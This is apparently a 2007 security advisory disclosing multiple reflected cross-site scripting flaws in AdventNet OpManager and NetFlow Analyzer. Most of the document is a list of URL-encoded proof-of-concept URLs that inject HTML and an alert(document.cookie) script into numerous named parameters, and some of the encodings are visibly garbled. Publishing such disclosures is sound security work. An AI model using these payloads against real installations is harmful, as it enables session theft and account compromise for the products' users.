################################################### NetFlow Analizer 5 & OpManager 7 multiple XSS vendor url:http://www.adventnet.com/ advisore:http://lostmon.blogspot.com/2007/07/ netflow-analizer-5-opmanager-7-multiple.html vendor notify:yes exploits include:yes ################################################### NetFlow Analizer and OpManager contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate multiple params upon submission to multiple scripts.This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity. ##################### Versions afected: ##################### OpManager 7 OpManager 6 NetFlow Analizer 5 other versions can be vulnerables too ################### Solution: ################### No solutions was available at this time !!! ################## Time Line ################## Discovered:20-05-2007 vendor notify:02-07-2007 vendor response:---- disclosure:4-07-2007 ################### Examples ################### for exploit some flaws you need to login. ##################### OpManager ##################### http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%F% 67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E62% 6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3 E%3C%2F%62%6F%64%79%3E http://localhost:8080/devices/Search.do?searchTerm=sss%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%F% 6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selectedTab=Map http://localhost:8080/reports/ReportViewAction.do?selected Tab=Reports&selectedNode=Server_Memory_Utilization&reportN ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E %3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F% 6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6 D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20 %21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F% 57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6 1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69 %65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di splayName=webclient.reports.servers.memutil http://localhost:8080/reports/ReportViewAction.do?selectedT ab=Reports&selectedNode=Server_Memory_Utilization&reportNam e=Utilization_Report&displayName=webclient.reports.servers. memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61% 20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F %6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7 4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68% 31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21 %3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6 F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72% 69%70%74%3E%3C%2F%62%6F%64%79%3E http://localhost:8080/reports/ReportViewAction.do?selectedT ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62% 6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22 %68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7 3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61% 73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E %58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6 3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74% 2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62 %6F%64%79%3E&reportName=Utilization_Report&displayName=webc lient.reports.servers.cpuutil http://localhost:8080/admin/ServiceConfiguration.do?operati on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7 0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F% 73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E %4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2 1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20% 21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72 %74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2 F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte r&serviceName=Alerter http://localhost:8080/admin/DeviceAssociation.do?selectedNo de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6 8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E% 2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D %6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3 E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C% 2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63 %75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7 0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa me=com.adventnet.me.opmanager.webclient.admin.association.N TServiceAssociation http://localhost:8080/admin/DeviceAssociation.do?selectedTa b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61% 20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F %6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7 4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68% 31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21 %3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6 F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72% 69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf igurations http://localhost:8080/admin/DeviceAssociation.do?selectedTa b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F %64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6 8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73% 70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73 %20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5 8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63% 72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E %63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6 F%64%79%3E ####################### NetFlow Analizer ####################### http://localhost:8080/netflow/jspui/applicationList.jsp?alph a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68 %72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F %6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C %2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70 %3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D %65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E %3C%2F%62%6F%64%79%3E http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7 2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6 2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6 E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2 F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3 E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6 5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3 C%2F%62%6F%64%79%3E&appID=62 http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view= ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61% 20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F% 6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74% 6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31% 3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C% 2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63% 75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70% 74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20% 68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E% 2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D% 6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E% 3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F% 70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75% 6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74% 3E%3C%2F%62%6F%64%79%3E&grDisp=1 http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6 8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F% 6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2 F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65% 6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2 F%62%6F%64%79%3E http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68% 72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62 %6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2 0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62% 72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73 %63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2 E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F% 64%79%3E&period=hourly&customOption=true&firstTime=true #################### €nd ################################ Thnx to estrella to be my ligth. Thnx to all Lostmon Team !!! -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....